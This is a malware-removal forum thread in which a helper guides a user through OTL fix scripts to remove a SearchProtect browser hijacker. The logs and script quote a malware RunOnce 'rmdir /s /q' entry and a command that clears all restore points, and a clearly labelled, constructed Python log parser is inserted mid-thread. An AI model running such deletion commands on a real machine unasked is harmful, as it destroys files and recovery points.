[2011/03/28 12:38:47 | 000,015,812 | ---- | C] () -- C:\Users\Alan\danube.zip
[2011/03/28 12:37:46 | 000,023,841 | ---- | C] () -- C:\Users\Alan\bedizen.zip
[2011/03/26 17:58:01 | 000,000,258 | RHS- | C] () -- C:\ProgramData\ntuser.pol
 
========== ZeroAccess Check ==========
 
[2006/11/02 15:30:40 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2012/06/08 17:59:03 | 012,899,840 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2012/06/08 17:47:00 | 011,586,048 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009/04/11 07:11:14 | 000,891,392 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\SysWow64\wbem\fastprox.dll -- [2009/04/11 06:28:19 | 000,614,912 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2008/01/21 02:50:58 | 000,513,024 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
"" = %systemroot%\SysWow64\wbem\wbemess.dll
 
========== LOP Check ==========
 
[2014/03/15 21:45:16 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\Audacity
[2013/10/01 23:14:48 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\AVG
[2011/03/26 12:34:10 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\AVG10
[2013/12/20 22:13:01 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\com.adobe.downloadassistant.AdobeDownloadAssistant
[2014/02/05 22:05:33 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\com.elance.tracker
[2013/12/03 18:54:59 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\Dropbox
[2014/03/28 16:06:38 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\FileZilla
[2013/10/01 13:51:37 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\GitHub
[2013/10/01 20:54:09 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\GoodSync
[2011/04/08 21:25:07 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\Inspyder Sitemap Creator
[2013/04/25 23:37:22 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\MySQL
[2013/10/01 21:04:11 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\Nico Mak Computing
[2013/04/26 13:39:49 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\Notepad++
[2012/06/01 16:33:17 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\OpenOffice.org
[2013/03/25 10:56:59 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\Opera
[2013/05/23 13:20:58 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\StageManager.BD092818F67280F4B42B04877600987F0111B594.1
[2012/07/21 11:10:40 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\Subversion
[2012/09/06 07:02:10 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\Tatara Systems
[2012/06/01 00:40:19 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\Template
[2013/04/28 15:15:47 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\TuneUp Software
[2012/07/22 22:28:22 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\UBot Studio
[2014/02/18 10:20:56 | 000,000,000 | ---D | M] -- C:\Users\Alan\AppData\Roaming\WinFF
[2013/02/14 17:45:20 | 000,000,000 | ---D | M] -- C:\Users\Default\AppData\Roaming\TuneUp Software
[2013/02/14 17:45:20 | 000,000,000 | ---D | M] -- C:\Users\Default User\AppData\Roaming\TuneUp Software
 
========== Purity Check ==========
 
 
 
========== Alternate Data Streams ==========
 
@Alternate Data Stream - 120 bytes -> C:\ProgramData\TEMP:D5AD7675
 
< End of report >
 
 

Run OTL

  • Under the Custom Scans/Fixes box at the bottom, paste in the following

    :OTL

    FF - prefs.js..browser.search.defaultenginename,: ""

    FF - prefs.js..browser.search.order.1: ""

    FF - prefs.js..browser.search.order.1,: ""

    FF - prefs.js..browser.search.selectedEngine,: ""

    FF - prefs.js..keyword.URL: ""

    O4 - HKU\.DEFAULT..\RunOnce: [spUninstallDeleteDir] rmdir /s /q "\SearchProtect" File not found

    O4 - HKU\S-1-5-18..\RunOnce: [spUninstallDeleteDir] rmdir /s /q "\SearchProtect" File not found

    :files

    ipconfig /flushdns /c

    :Commands

    [emptytemp]

    [clearallrestorepoints]

  • Then click the Run Fix button at the top
  • Let the program run unhindered, reboot the PC when it is done
  • Please post the OTL fix log in your next reply.
Note: A copy of an OTL fix log is saved in a text file at C:\_OTL\MovedFiles

Still present:

 

All processes killed
Error: Unable to interpret <------------ QUOTE ----------> in the current context!
========== OTL ==========
Prefs.js: "" removed from browser.search.defaultenginename,
Prefs.js: "" removed from browser.search.order.1
Prefs.js: "" removed from browser.search.order.1,
Prefs.js: "" removed from browser.search.selectedEngine,
Prefs.js: "" removed from keyword.URL
Registry value HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\RunOnce\\SpUninstallDeleteDir deleted successfully.
Registry value HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\RunOnce\\SpUninstallDeleteDir not found.
========== FILES ==========
< ipconfig /flushdns /c >
Windows IP Configuration
Successfully flushed the DNS Resolver Cache.
C:\Users\Alan\Desktop\VIRUS REMOVAL\cmd.bat deleted successfully.
C:\Users\Alan\Desktop\VIRUS REMOVAL\cmd.txt deleted successfully.
========== COMMANDS ==========
 
[EMPTYTEMP]
 
User: Alan
->Temp folder emptied: 888375 bytes
->Temporary Internet Files folder emptied: 2415824 bytes
->Java cache emptied: 0 bytes
->FireFox cache emptied: 0 bytes
->Google Chrome cache emptied: 384326841 bytes
->Apple Safari cache emptied: 0 bytes
->Opera cache emptied: 0 bytes
->Flash cache emptied: 405 bytes
 
User: All Users
 
User: AppData
 
User: Default
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
 
User: Default User
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
 
User: Public
 
%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 0 bytes
%systemroot%\System32 (64bit) .tmp files removed: 0 bytes
%systemroot%\System32\drivers .tmp files removed: 0 bytes
Windows Temp folder emptied: 7490 bytes
%systemroot%\sysnative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files folder emptied: 0 bytes
RecycleBin emptied: 270628325 bytes
 
Total Files Cleaned = 628.00 mb
 
Restore point Set: OTL Restore Point
Error: Unable to interpret <-----------------------------> in the current context!
 
OTL by OldTimer - Version 3.2.69.0 log created on 03292014_182647
 
Files\Folders moved on Reboot...
File move failed. C:\Windows\temp\ib2 scheduled to be moved on reboot.
File move failed. C:\Windows\temp\ib3 scheduled to be moved on reboot.
File move failed. C:\Windows\temp\ib4 scheduled to be moved on reboot.
File move failed. C:\Windows\temp\ib5 scheduled to be moved on reboot.
File move failed. C:\Windows\temp\ib6 scheduled to be moved on reboot.
 
PendingFileRenameOperations files...
 
Registry entries deleted on Reboot...

This script did not work, because when you marked this script the word Quote was there too. Your script in OTL should look like this:

:OTL

FF - prefs.js..browser.search.defaultenginename,: ""

FF - prefs.js..browser.search.order.1: ""

FF - prefs.js..browser.search.order.1,: ""

FF - prefs.js..browser.search.selectedEngine,: ""

FF - prefs.js..keyword.URL: ""

O4 - HKU\.DEFAULT..\RunOnce: [spUninstallDeleteDir] rmdir /s /q "\SearchProtect" File not found

O4 - HKU\S-1-5-18..\RunOnce: [spUninstallDeleteDir] rmdir /s /q "\SearchProtect" File not found

:files

ipconfig /flushdns /c

:Commands

[emptytemp]

[clearallrestorepoints]
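
The OTL fix logs posted in this thread follow a fixed line format, so the failure described above (a stray forum line such as the QUOTE marker being handed to the OTL interpreter) and items that were only deferred to reboot can be picked out automatically. This is an added example, not OTL's or the forum's own tooling; the sample log is constructed from lines posted in this thread.

```python
import re

# Line shapes OTL writes in its fix log, as seen in the logs in this thread.
# Order matters: "Registry value ... deleted successfully." must be tried
# before the generic "<path> deleted successfully." pattern.
_PATTERNS = {
    "interpreter_error": re.compile(r"^Error: Unable to interpret <(.*)> in the current context!$"),
    "registry_deleted": re.compile(r"^Registry value (.+) deleted successfully\.$"),
    "registry_not_found": re.compile(r"^Registry value (.+) not found\.$"),
    "pref_removed": re.compile(r'^Prefs\.js: "(.*)" removed from (.+)$'),
    "file_deleted": re.compile(r"^(.+) deleted successfully\.$"),
    "move_on_reboot": re.compile(r"^File move failed\. (.+) scheduled to be moved on reboot\.$"),
}

# Constructed sample: a handful of lines copied from the fix logs posted above.
SAMPLE_LOG = r"""
All processes killed
Error: Unable to interpret <------------ QUOTE ----------> in the current context!
========== OTL ==========
Prefs.js: "" removed from keyword.URL
Registry value HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\RunOnce\\SpUninstallDeleteDir deleted successfully.
Registry value HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\RunOnce\\SpUninstallDeleteDir not found.
========== FILES ==========
C:\Users\Alan\Desktop\VIRUS REMOVAL\cmd.bat deleted successfully.
Files\Folders moved on Reboot...
File move failed. C:\Windows\temp\ib2 scheduled to be moved on reboot.
"""


def parse_otl_fix_log(text):
    """Classify each log line; returns {category: [captured item, ...]}."""
    result = {name: [] for name in _PATTERNS}
    for line in text.splitlines():
        line = line.strip()
        for name, pattern in _PATTERNS.items():
            match = pattern.match(line)
            if match:
                result[name].append(match.group(1))
                break  # first matching pattern wins
    return result


def fix_log_problems(parsed):
    """Turn parsed categories into the follow-ups a helper would ask for."""
    problems = []
    for junk in parsed["interpreter_error"]:
        problems.append(f"script contained a non-OTL line ({junk!r}); re-paste it without forum markup")
    for path in parsed["move_on_reboot"]:
        problems.append(f"{path} is only scheduled for removal; confirm it is gone after the reboot")
    return problems
```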


Ok, I've tried that again. It's still installed:

 

All processes killed
========== OTL ==========
Prefs.js: "" removed from browser.search.defaultenginename,
Prefs.js: "" removed from browser.search.order.1
Prefs.js: "" removed from browser.search.order.1,
Prefs.js: "" removed from browser.search.selectedEngine,
Prefs.js: "" removed from keyword.URL
Registry value HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\RunOnce\\SpUninstallDeleteDir not found.
Registry value HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\RunOnce\\SpUninstallDeleteDir not found.
========== FILES ==========
< ipconfig /flushdns /c >
Windows IP Configuration
Successfully flushed the DNS Resolver Cache.
C:\Users\Alan\Desktop\VIRUS REMOVAL\cmd.bat deleted successfully.
C:\Users\Alan\Desktop\VIRUS REMOVAL\cmd.txt deleted successfully.
========== COMMANDS ==========
 
[EMPTYTEMP]
 
User: Alan
->Temp folder emptied: 371531 bytes
->Temporary Internet Files folder emptied: 2368526 bytes
->Java cache emptied: 0 bytes
->FireFox cache emptied: 0 bytes
->Google Chrome cache emptied: 247717444 bytes
->Apple Safari cache emptied: 0 bytes
->Opera cache emptied: 0 bytes
->Flash cache emptied: 639 bytes
 
User: All Users
 
User: AppData
 
User: Default
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
 
User: Default User
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
 
User: Public
 
%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 0 bytes
%systemroot%\System32 (64bit) .tmp files removed: 0 bytes
%systemroot%\System32\drivers .tmp files removed: 0 bytes
Windows Temp folder emptied: 1254 bytes
%systemroot%\sysnative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files folder emptied: 0 bytes
RecycleBin emptied: 0 bytes
 
Total Files Cleaned = 239.00 mb
 
Restore point Set: OTL Restore Point
 
OTL by OldTimer - Version 3.2.69.0 log created on 03302014_121153
 
Files\Folders moved on Reboot...
File move failed. C:\Windows\temp\ib2 scheduled to be moved on reboot.
File move failed. C:\Windows\temp\ib3 scheduled to be moved on reboot.
File move failed. C:\Windows\temp\ib4 scheduled to be moved on reboot.
File move failed. C:\Windows\temp\ib5 scheduled to be moved on reboot.
File move failed. C:\Windows\temp\ib6 scheduled to be moved on reboot.
 
PendingFileRenameOperations files...
 
Registry entries deleted on Reboot...

  • Root Admin

Due to the lack of feedback this topic is closed to prevent others from posting here. If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this thread with your request. This applies only to the originator of this thread.

Other members who need assistance please start your own topic in a new thread. Thanks!
